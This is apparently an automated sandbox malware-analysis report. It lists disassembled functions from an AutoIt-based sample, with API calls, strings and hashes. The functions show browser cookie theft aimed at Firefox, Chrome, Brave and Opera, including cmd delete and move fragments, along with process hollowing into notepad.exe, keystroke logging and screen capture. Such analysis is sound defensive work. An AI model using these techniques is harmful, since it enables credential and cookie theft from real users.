Sleep.KERNEL32(000009C4,00000000,04748844,?,?,?,?,00000009,00000000,00000000), ref: 047486FE
Sleep.KERNEL32(00000064,?,00000000,04748844,?,?,?,?,00000009,00000000,00000000), ref: 047487CC

Part of subcall function 047248B8: CloseHandle.KERNEL32(00000000), ref: 047249C5

Strings

/c del /q /f /s , xrefs: 047485DA
opera.exe, xrefs: 047487C0
" && move firefox firefox, xrefs: 0474858F
/c cd /d ", xrefs: 04748587, 04748647, 04748686, 04748703, 04748742
Google, xrefs: 0474860F
" && move BraveSoftware braveSoftware, xrefs: 0474870B, 0474874A
chrome.exe, xrefs: 04748633
Mozilla\, xrefs: 04748557
BraveSoftware, xrefs: 047486CB
firefox, xrefs: 047485C1
cookie, xrefs: 047487AF, 047487F2
" && move Google google, xrefs: 0474864F, 0474868E
firefox.exe, xrefs: 04748573
brave.exe, xrefs: 047486EF
cmd.exe, xrefs: 047485B4, 047485F7, 04748674, 047486B3, 04748730, 0474876F
Opera Software, xrefs: 04748795
firefox\*, xrefs: 047485E2

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Sleep$AttributesCloseFileHandle
String ID: " && move BraveSoftware braveSoftware$" && move Google google$" && move firefox firefox$/c cd /d "$/c del /q /f /s $BraveSoftware$Google$Mozilla\$Opera Software$brave.exe$chrome.exe$cmd.exe$cookie$firefox$firefox.exe$firefox\*$opera.exe
API String ID: 1617435388-3698069828
Opcode ID: 52f4230554d1a553b43f4a52ea3a48666a8c5b865d6042b07e50f76eb6f05584
Instruction ID: 0f51fe84c05d4de2640199fd2e075b1e2bb901318ca752c4715f694a0c90d2e6
Opcode Fuzzy Hash: 52f4230554d1a553b43f4a52ea3a48666a8c5b865d6042b07e50f76eb6f05584
Instruction Fuzzy Hash: 1A812A38A0011DABFB00FBE4CA41AAEB3B6EF94718F514165E900B7354DB71BE069B56

Function 0472B850 Relevance: 31.7, APIs: 21, Instructions: 194windowCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,00000054,?), ref: 0472B873
GetDC.USER32(00000000), ref: 0472B8A1
CreateCompatibleDC.GDI32(?), ref: 0472B8B2
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 0472B8CD
SelectObject.GDI32(?,00000000), ref: 0472B8E7
PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 0472B909
CreateCompatibleDC.GDI32(?), ref: 0472B917
SelectObject.GDI32(?), ref: 0472B95F
SelectPalette.GDI32(?,?,00000000), ref: 0472B972
RealizePalette.GDI32(?), ref: 0472B97B
SelectPalette.GDI32(?,?,00000000), ref: 0472B987
RealizePalette.GDI32(?), ref: 0472B990
SetBkColor.GDI32(?), ref: 0472B99A
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0472B9BE
SetBkColor.GDI32(?,00000000), ref: 0472B9C8
SelectObject.GDI32(?,00000000), ref: 0472B9DB
DeleteObject.GDI32 ref: 0472B9E7
DeleteDC.GDI32(?), ref: 0472B9FD
SelectObject.GDI32(?,00000000), ref: 0472BA18
DeleteDC.GDI32(00000000), ref: 0472BA34
ReleaseDC.USER32(00000000,00000000), ref: 0472BA45

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
String ID:
API String ID: 332224125-0
Opcode ID: adbac7fd007c6828cb731d20fcd915f445cf1d6c53f080902f311fd48acaf4a4
Instruction ID: 54989cbf5ab8b198c79ff1ee9f1e084fb3ff162125b446ad80dea3ba1ea57434
Opcode Fuzzy Hash: adbac7fd007c6828cb731d20fcd915f445cf1d6c53f080902f311fd48acaf4a4
Instruction Fuzzy Hash: 5851EBB1E10229BBEB10EBE8CD55BAEB7FCEB08704F104859B654E7280E674B9418B54

Function 00C60429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 00C51821: _memmove.LIBCMT ref: 00C5185B

GetForegroundWindow.USER32(00CD0980,?,?,?,?,?), ref: 00C604E3
IsWindow.USER32(?), ref: 00C966BB

Strings

TITLE, xrefs: 00C96650
HANDLE, xrefs: 00C9649E
ALL, xrefs: 00C96622
REGEXPTITLE, xrefs: 00C964B4
CLASS, xrefs: 00C964E5
INSTANCE, xrefs: 00C965FA
ACTIVE, xrefs: 00C96488
REGEXPCLASS, xrefs: 00C96506
LAST, xrefs: 00C96472

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: f639831d08dec974c55789cbf3bb073caaf80a08933eeac141eb5099fa786804
Instruction ID: f043791bcb35c0bdb1b39b13bab850e7f814e75d98073a326a420f8d88ab044d
Opcode Fuzzy Hash: f639831d08dec974c55789cbf3bb073caaf80a08933eeac141eb5099fa786804
Instruction Fuzzy Hash: 09D1D970104202EFCF14EF60C485A6AFBB5BF54344F244619F866532A2DF30FA99DB92

Function 0472C5EC Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 351windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0472C856
CreateCompatibleDC.GDI32(00000001), ref: 0472C8BB
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 0472C8D0
SelectObject.GDI32(?,00000000), ref: 0472C8DA
SelectPalette.GDI32(?,?,00000000), ref: 0472C90A
RealizePalette.GDI32(?), ref: 0472C916
CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 0472C93A
GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,0472C993,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0472C948
SelectPalette.GDI32(?,00000000,000000FF), ref: 0472C97A
SelectObject.GDI32(?,?), ref: 0472C987
DeleteObject.GDI32(00000000), ref: 0472C98D

Strings

BM, xrefs: 0472C710
(, xrefs: 0472C7A5

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
String ID: ($BM
API String ID: 2831685396-2980357723
Opcode ID: 62ee999af70ed51a6d251b203a0db2d73d2cba23fd67fa82fad9b8a9a35c5239
Instruction ID: 9f985de9f581ac52ccfb44318f3da27ff76260a0202570f288c52643806f5939
Opcode Fuzzy Hash: 62ee999af70ed51a6d251b203a0db2d73d2cba23fd67fa82fad9b8a9a35c5239
Instruction Fuzzy Hash: BFD14EB4A002289FEF15DFA8C994BAEBBF5FF49304F008569E944EB354D734A841CB65

Function 00CC441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00CC44AC
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00CC456C

Strings

ISSELECTED, xrefs: 00CC4577
GETITEMCOUNT, xrefs: 00CC44DE
SELECTALL, xrefs: 00CC45D3
SELECTCLEAR, xrefs: 00CC45EB
FINDITEM, xrefs: 00CC46DF
SELECTINVERT, xrefs: 00CC463C
DESELECT, xrefs: 00CC465A
VIEWCHANGE, xrefs: 00CC472B
GETSUBITEMCOUNT, xrefs: 00CC44F7
GETSELECTEDCOUNT, xrefs: 00CC454F
GETSELECTED, xrefs: 00CC469A
GETTEXT, xrefs: 00CC4515
SELECT, xrefs: 00CC4606

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 5027cc38731f281ebb6cd3117937d8204bb54c6797c3b55c68cece866ff38531
Instruction ID: 95cddc060f9e5e0d9d272922d681f4a9eb8eb6c69fc643079659d3e9f2d46e63
Opcode Fuzzy Hash: 5027cc38731f281ebb6cd3117937d8204bb54c6797c3b55c68cece866ff38531
Instruction Fuzzy Hash: 89A15D742142059FCB18EF24C9A1F6AB3A5BF85314F20896CF8669B7D2DB30ED05DB51

Function 04719098 Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 475processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 047191F4
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,00000000,00000004), ref: 04719218
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0471924B
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,00000000,00000004), ref: 0471926B
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,00000000,00000004), ref: 047192A3

Part of subcall function 0471870C: GetTickCount.KERNEL32 ref: 04718785

GetTickCount.KERNEL32 ref: 047196AE

Strings

NtGetContextThread, xrefs: 047192F7
NtSetContextThread, xrefs: 047194A4
NtTerminateProcess, xrefs: 04719549, 047195C8, 047196A4
NtResumeThread, xrefs: 047194FB
notepad.exe, xrefs: 04719105
D, xrefs: 047191B2
NtUnmapViewOfSection, xrefs: 04719353
cmd.exe, xrefs: 04719120
NtFreeVirtualMemory, xrefs: 0471966E

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CreateProcess$CountTick
String ID: D$NtFreeVirtualMemory$NtGetContextThread$NtResumeThread$NtSetContextThread$NtTerminateProcess$NtUnmapViewOfSection$cmd.exe$notepad.exe
API String ID: 2656259652-830972145
Opcode ID: 3d84535250ee7442c6d7016eeccc449612f808dd35b08dfab39f4ad9adaea3e2
Instruction ID: 79781677eba32289e34f66a4026d78d051acb8deb035aa4508c2db100e5c8689
Opcode Fuzzy Hash: 3d84535250ee7442c6d7016eeccc449612f808dd35b08dfab39f4ad9adaea3e2
Instruction Fuzzy Hash: FD12FCB0A00218AFEB50DBA8CD95FDEB7B8AF09304F504095E648F7391E774AA45CF65

Function 00C9CB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00C9CBAA
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C9CBBC
SetWindowTextW.USER32(?,?), ref: 00C9CBD3
GetDlgItem.USER32(?,000003EA), ref: 00C9CBE8
SetWindowTextW.USER32(00000000,?), ref: 00C9CBEE
GetDlgItem.USER32(?,000003E9), ref: 00C9CBFE
SetWindowTextW.USER32(00000000,?), ref: 00C9CC04
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C9CC25
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C9CC3F
GetWindowRect.USER32(?,?), ref: 00C9CC48
SetWindowTextW.USER32(?,?), ref: 00C9CCB3
GetDesktopWindow.USER32 ref: 00C9CCB9
GetWindowRect.USER32(00000000), ref: 00C9CCC0
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00C9CD0C
GetClientRect.USER32(?,?), ref: 00C9CD19
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00C9CD3E
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C9CD69

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 37dec04411a94080a437643c4b6d8f474d8f0d5715b3fbf3923741a2bfc7d033
Instruction ID: 77440075769e9fa44657a9136b8d8914a00c4f2b8233a976d088f9e9c213b029
Opcode Fuzzy Hash: 37dec04411a94080a437643c4b6d8f474d8f0d5715b3fbf3923741a2bfc7d033
Instruction Fuzzy Hash: D5515971900709AFDB20DFA8CE8AB6EBBF5FF04705F104929F696A25A0C774E915CB50

Function 0471C084 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 250sleepkeyboardthreadCOMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(0000000A,00000000,?,00000000), ref: 0471C0D2
GetWindowThreadProcessId.USER32(?,?), ref: 0471C0FC
GetKeyboardLayout.USER32(?), ref: 0471C108

Part of subcall function 0471C068: GetAsyncKeyState.USER32(00000000), ref: 0471C06C

MapVirtualKeyExA.USER32(00000000,00000000,00000000), ref: 0471C18C
GetKeyNameTextA.USER32(00000000,?,00000021), ref: 0471C1A2

Part of subcall function 0471B62C: GetForegroundWindow.USER32(00000000,0471B68E,?,?,?,?,00000000), ref: 0471B644
Part of subcall function 0471B62C: GetWindowTextLengthA.USER32(00000000), ref: 0471B64C
Part of subcall function 0471B62C: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0471B669

Sleep.KERNEL32(?,00000000,0471C456), ref: 0471C421

Strings

{Del2}, xrefs: 0471C285
{Insert}, xrefs: 0471C24F
{Tab}, xrefs: 0471C273
{end}, xrefs: 0471C2BB
{Del}, xrefs: 0471C297
{Esc}, xrefs: 0471C261
{start}, xrefs: 0471C2A9

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Window$Text$AsyncForegroundInfoKeyboardLayoutLengthNameParametersProcessSleepStateSystemThreadVirtual
String ID: {Del2}${Del}${Esc}${Insert}${Tab}${end}${start}
API String ID: 2662919289-1295617917
Opcode ID: 6dd2aebe3273707e6bce5e67e265ef8583d8eebca96e889649131e3add9d3617
Instruction ID: 66e7e385eb378d3280e6e4da8ab1894054807e623058fefe5da9b263a15d2dc6
Opcode Fuzzy Hash: 6dd2aebe3273707e6bce5e67e265ef8583d8eebca96e889649131e3add9d3617
Instruction Fuzzy Hash: 7F81D671A842188FFB22EAEDCD84AFF7778EB44308F104566D551E2734EA30FA418A56

Function 00CCA7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CCA87E
DestroyWindow.USER32(?,?), ref: 00CCA8F8

Part of subcall function 00C51821: _memmove.LIBCMT ref: 00C5185B

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00CCA972
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00CCA994
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CCA9A7
DestroyWindow.USER32(00000000), ref: 00CCA9C9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C40000,00000000), ref: 00CCAA00
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CCAA19
GetDesktopWindow.USER32 ref: 00CCAA32
GetWindowRect.USER32(00000000), ref: 00CCAA39
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CCAA51
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00CCAA69

Part of subcall function 00C429AB: GetWindowLongW.USER32(?,000000EB), ref: 00C429BC

Strings

tooltips_class32, xrefs: 00CCA96B, 00CCA9F9
0, xrefs: 00CCA894

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: e880c5fc57cf76382dd3e47d8b78813c74042b7e1dcc82a87d4fa751f044ffc7
Instruction ID: 68f25102ecbe3a7b59871b17917f7f3b65d67ec9deaa7a2f6c0eb5ad4ee87932
Opcode Fuzzy Hash: e880c5fc57cf76382dd3e47d8b78813c74042b7e1dcc82a87d4fa751f044ffc7
Instruction Fuzzy Hash: 1A718771544248AFD721CF28C849F6B77E5FB88308F18451DF99A8B2A1D770EA06DB62

Function 047413D4 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDeviceCaps.GDI32(?,00000026), ref: 04741462
GetSystemPaletteEntries.GDI32(?,00000000,00000100,00000004), ref: 0474149E
CreatePalette.GDI32(00000000), ref: 047414AF
CreateCompatibleDC.GDI32(?), ref: 0474150B
ReleaseDC.USER32(00000000,?), ref: 04741521

Part of subcall function 047254F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020119), ref: 04725520
Part of subcall function 047254F8: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000004,00000004,80000001,00000000,00000000,00020119), ref: 04725547
Part of subcall function 047254F8: RegCloseKey.ADVAPI32(00000000,80000001,00000000,00000000,00020119), ref: 0472555F

CreateCompatibleBitmap.GDI32(?,00000000), ref: 0474153C
DeleteDC.GDI32(00000000), ref: 0474154D
ReleaseDC.USER32(00000000,?), ref: 04741555
SelectObject.GDI32(00000000,00000000), ref: 04741563
BitBlt.GDI32(00000000,00000000,00000000,00000000), ref: 0474158C
GetCursorPos.USER32(?), ref: 04741595

Part of subcall function 0474138C: GetCursorInfo.USER32(00000014), ref: 047413A8
Part of subcall function 0474138C: DrawIconEx.USER32(00000000,?,?,?,00000020,00000020,00000000,00000000,00000003), ref: 047413C7

Part of subcall function 0472CBC4: GetObjectA.GDI32(?,00000054,?), ref: 0472CBFE

DeleteObject.GDI32(00000000), ref: 047415B1

Strings

Control Panel\Desktop\WindowMetrics, xrefs: 04741438
AppliedDPI, xrefs: 04741433

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CreateObject$CompatibleCursorDeletePaletteRelease$BitmapCapsCloseDeviceDrawEntriesIconInfoOpenQuerySelectSystemValue
String ID: AppliedDPI$Control Panel\Desktop\WindowMetrics
API String ID: 1784952395-3919141887
Opcode ID: 7cd6e430778e57623fad9d561640b99c7a2266cead4f4673e4e7234e32724d57
Instruction ID: a3108027da4ba5c9c5ca5d0ecfd4e1af185c46afde2b4f8d114fd5c284deed7e
Opcode Fuzzy Hash: 7cd6e430778e57623fad9d561640b99c7a2266cead4f4673e4e7234e32724d57
Instruction Fuzzy Hash: 815175707002049FE714FF68D958BAEB7B9EF49304F508169E205DB391DB74AC85CB95

Function 00CA82D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00CA831A
VariantCopy.OLEAUT32(00000000,?), ref: 00CA8323
VariantClear.OLEAUT32(00000000), ref: 00CA832F
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00CA841D
__swprintf.LIBCMT ref: 00CA844D
VarR8FromDec.OLEAUT32(?,?), ref: 00CA8479
VariantInit.OLEAUT32(?), ref: 00CA852A
SysFreeString.OLEAUT32(?), ref: 00CA85BE
VariantClear.OLEAUT32(?), ref: 00CA8618
VariantClear.OLEAUT32(?), ref: 00CA8627
VariantInit.OLEAUT32(00000000), ref: 00CA8665

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00CA8447
Default, xrefs: 00CA84DA

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 571c9286946a4960c4204fd4653321f3f9af089b17ace23de45c15afd66959d1
Instruction ID: 51f94daf0e00ef2484ad9b6d8cabdce517e013b1e3e1f27c05496b56ced32bb4
Opcode Fuzzy Hash: 571c9286946a4960c4204fd4653321f3f9af089b17ace23de45c15afd66959d1
Instruction Fuzzy Hash: E6D1E071A04116EBDF209FA6C884B6EB7B4BF06705F248155F815AB290DF30DD48EBA1

Function 00CC49CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00CC4A61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CC4AAC

Strings

GETTOTALCOUNT, xrefs: 00CC4A93
GETITEMCOUNT, xrefs: 00CC4B8E
EXISTS, xrefs: 00CC4B15
EXPAND, xrefs: 00CC4B5E
GETSELECTED, xrefs: 00CC4BBC
COLLAPSE, xrefs: 00CC4AF2
GETTEXT, xrefs: 00CC4BFF
SELECT, xrefs: 00CC4C5D
UNCHECK, xrefs: 00CC4C88
ISCHECKED, xrefs: 00CC4C2F
CHECK, xrefs: 00CC4ACC

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 0dec84beed22ef841643563de0bd2225288f36abd8a397e01e762cfbc8c939a5
Instruction ID: c622989bf71de8ac83a4400ac43fb2cb50bd86a6adcf1f9c9aeae699013e2b50
Opcode Fuzzy Hash: 0dec84beed22ef841643563de0bd2225288f36abd8a397e01e762cfbc8c939a5
Instruction Fuzzy Hash: CE9170746047159FCB18EF10C4A1B6EB7A1BF94354F20895CF8965B3A2CB31ED49EB82

Function 00CAE25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00CAE31F
SystemTimeToFileTime.KERNEL32(?,?), ref: 00CAE32F
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CAE33B
__wsplitpath.LIBCMT ref: 00CAE399
_wcscat.LIBCMT ref: 00CAE3B1
_wcscat.LIBCMT ref: 00CAE3C3
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CAE3D8
SetCurrentDirectoryW.KERNEL32(?), ref: 00CAE3EC
SetCurrentDirectoryW.KERNEL32(?), ref: 00CAE41E
SetCurrentDirectoryW.KERNEL32(?), ref: 00CAE43F
_wcscpy.LIBCMT ref: 00CAE44B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00CAE48A

Strings

*.*, xrefs: 00CAE445

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 0a63f93781d95f80b4ba1ab11caf643bba73a492fc51b0d3e581b125d7eea97f
Instruction ID: c0cb715919eae9a791d74a6b1bc0847342672be8e1f7d4dbbc9f857a20915a35
Opcode Fuzzy Hash: 0a63f93781d95f80b4ba1ab11caf643bba73a492fc51b0d3e581b125d7eea97f
Instruction Fuzzy Hash: 346169725043069FC710EF64C884A9EB3E8FF89314F14891EF999C7251EB35EA45CB92

Function 00CAA27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00CAA2C2

Part of subcall function 00C51A36: _memmove.LIBCMT ref: 00C51A77

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00CAA2E3
__swprintf.LIBCMT ref: 00CAA33C
__swprintf.LIBCMT ref: 00CAA355
_wprintf.LIBCMT ref: 00CAA3FC
_wprintf.LIBCMT ref: 00CAA41A

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00CAA3F7
"%s" (%d) : ==> %s:, xrefs: 00CAA415
Line %d (File "%s"):, xrefs: 00CAA336, 00CAA34F
Error: , xrefs: 00CAA3C4
Incorrect parameters to object property !, xrefs: 00CAA39E
